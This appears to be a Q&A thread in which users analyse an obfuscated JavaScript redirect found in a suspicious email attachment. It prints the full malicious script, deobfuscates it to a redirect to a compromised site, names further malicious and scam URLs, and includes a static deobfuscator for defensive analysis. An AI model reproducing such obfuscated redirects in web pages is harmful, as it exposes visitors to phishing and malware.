A few of my non-IT coworkers opened a .html attachment in an email message that looks extremely suspicious. It resulted in a blank screen when it appears that some JavaScript code was run.

<script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script>

What did it do? It's beyond the scope of my programming knowledge.

+18  A: 

It will redirect to a URL, 'http://lendermedia.com/images/z.htm' (follow it at your own risk).

Copy and paste the code to a worthy JavaScript editor and have it format the source for you.

Key points:

var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');

h will equal 'http://lendermedia.com/images/z.htm'

t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];

t will contain a reference to document.location

b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h;

The property named href of b, which at this point (inside another function) really is t from the above statement, is set to h, which is the url.

Most of the code is mere noise, the actual functionality consists of this:

function uK() {
};
uK.prototype = {
  f : function() {
    // Strip the filler characters ^ H ! 9 X to recover the target URL
    var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'
        .replace(/[\^H\!9X]/g, '');
    // 'lDo6cDart>iro6nD' minus D r ] 6 > is 'location', so t = document.location
    t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];
    function x(b) {
      // 'hIrBeTf.' minus . B T A I is 'href': b.href = h, i.e. the redirect
      b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h;
    }
    x(t);
  }
};
var tL = new uK();
tL.f();
Lauri Lehtinen
I don't suggest anyone click this link. That page loads an iframe from http://onionfleet.ru:8080/index.php?pid=10, and redirects to http://mouselong.com. Also **don't click the links in this comment** unless you know what you're doing.
x1a4
which in turn contains an iframe linking to some scam site that sells *not so authentic* watches apparently...
nico
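The accepted answer recovers the strings by hand; the following is an added example (not code from the question or any answer) of doing the same statically, without ever executing the attachment: it finds every `'literal'.replace(/[chars]/g, '')` call, rebuilds the regex from its source text and applies it, so an analyst gets the URL and the `location`/`href` property names straight from the file. `SAMPLE` is a constructed excerpt of the script from the question, trimmed to the three statements that matter.

```javascript
// Static deobfuscator for the "strip filler characters" idiom used in the
// attachment. Nothing here is evaluated as code; the sample is only text.

// Constructed sample: the three meaningful statements from the posted script.
const SAMPLE = String.raw`var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');` +
  String.raw`t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];` +
  String.raw`b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;`;

// Matches 'literal'.replace(/[character class]/flags, '') and captures the
// literal, the character-class source and the regex flags.
const STRIP_CALL =
  /'((?:[^'\\]|\\.)*)'\s*\.replace\(\s*\/(\[(?:[^\]\\]|\\.)*\])\/([a-z]*)\s*,\s*''\s*\)/g;

// Returns [{obfuscated, decoded}] for each strip-style replace call found.
function decodeStripCalls(src) {
  const found = [];
  for (const m of src.matchAll(STRIP_CALL)) {
    const [, literal, charClass, flags] = m;
    // Rebuild the regex from its source text and apply it exactly as the
    // script would, but to a string we control rather than by running it.
    const decoded = literal.replace(new RegExp(charClass, flags), '');
    found.push({ obfuscated: literal, decoded });
  }
  return found;
}

// Decoded strings that look like URLs: the indicators worth blocking at the
// proxy or searching for in web logs after someone opened the attachment.
function extractUrls(src) {
  return decodeStripCalls(src)
    .map((f) => f.decoded)
    .filter((s) => /^https?:\/\//i.test(s));
}

// Stand-alone run: prints the decoded strings and the URL list.
console.log(decodeStripCalls(SAMPLE));
console.log(extractUrls(SAMPLE));
```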
A: 

Minus the obfuscation, it does something like document.location.href="http://lendermedia.com/images/z.htm"

LaustN
A: 

The key part to understanding that code is the replace(/[\^H\!9X]/g, '') parts. If the 2nd argument for the replace is '', then it's merely removing stuff from the previous string.

Really inelegant way to obfuscate things. Probably the aim is just to be random for each user and avoid Bayesian spam filters.

gcb
+2  A: 

I encountered the same issue, and then found this page. After doing a WHOIS for the contact info, I contacted the owner of lendermedia.com, who appeared to have just found out that his site is hosting the z.htm page w/out his knowledge and against his wishes. At the time I contacted him I was able to browse his /images/ directory. He has since changed the permissions. All this to say that it appears this guy is clean, but that's for you to decide.

mmengel